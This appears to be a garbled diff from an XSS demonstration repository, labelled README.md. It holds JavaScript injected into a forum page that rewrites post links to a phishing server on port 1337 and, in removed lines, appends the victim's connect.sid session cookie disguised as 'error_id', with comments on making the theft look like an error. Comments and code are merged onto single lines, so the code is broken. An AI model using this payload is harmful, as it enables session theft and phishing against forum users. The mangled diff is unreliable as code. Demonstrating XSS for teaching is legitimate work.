phoebe-bee/xss-demo-aug-2019/README.md

   }

   var current_page_path = window.location.pathname;
   // If the session ID is one we've seen before, don't replace the hyperlinks.
-  // That way the redirect to the 'login' page looks like a one-off error to
-  // the user, and we don't collect the same session ID more than if (!current_page_path.includes("/post") && isNewSession()) {
+That way the redirect to the 'login' page looks like a one-off error to the user, and we don't collect the same session ID more than once if (!current_page_path.includes("/post") && isNewSession()) {
     // Only run the script on the forum home page, leave individual post pages alone
     $("td > a").each(function(i) {
       console.log(document.cookie);
       var original_path = $(this).attr("href");
+      var hostname = window.location.hostname;
       // Replace all links in the table of posts with links to the phishing site
-      // Pass along the ID of the post the user was trying to see (so we can
-      // direct them back to it after 'logging them back in') and the session
+      // Pass along the ID of the post the user was trying to see (so we can direct them back to it after 'logging them back in') var new_href = "http://" + hostname + ":1337" + original_path;
-      // ID so we can steal sessions if the mood takes us mwahaha
-      // the session_id is named error_id in the GET request so that if a user
-      // notices the token in the URL it's not so obvious what we're stealing var new_href = "http://127.0.0.1:1337" + original_path + "&error_id=" +
-                     getCookie("connect.sid");
       $(this).prop("href", new_href);
     });
     setCookie();